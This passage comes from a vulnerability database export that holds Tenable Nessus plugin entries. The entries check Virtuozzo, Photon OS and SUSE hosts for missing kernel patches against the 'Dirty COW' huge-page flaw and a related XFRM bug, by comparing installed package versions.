An attacker, able\n to run local code, could exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2915392\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-15.2-42.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ab3589df\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-18.7-42.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8dcc35e\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-20.18-42.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6312859\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.18.2.vz7.15.2\",\n \"patch\",\"readykernel-patch-15.2-42.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.42.0.vz7.18.7\",\n \"patch\",\"readykernel-patch-18.7-42.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.42.0.vz7.20.18\",\n \"patch\",\"readykernel-patch-20.18-42.0-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:07:04", "description": "An update of the linux package has been released.", "edition": 17, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 2.0: Linux PHSA-2017-2.0-0008", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000407", "CVE-2017-1000405"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121792", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-2.0-0008. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121792);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-1000407\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2017-2.0-0008\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000405\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local 
Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-api-headers-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", 
reference:\"linux-oprofile-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-lkcm-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.71-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:27:12", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-3225-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105072", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3225-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105072);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n 
attribute:\"description\",\n value:\n\"The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173225-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28062366\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 
12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise High Availability 12-SP3:zypper in -t patch\nSUSE-SLE-HA-12-SP3-2017-2006=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-2006=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-2006=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.92-6.30.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.92-6.30.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.92-6.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:27:12", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3226-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-3226-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105073", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3226-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105073);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3226-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n 
attribute:\"description\",\n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173226-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2dddb1e4\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 
12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-2007=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2017-2007=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-2007=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-2007=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 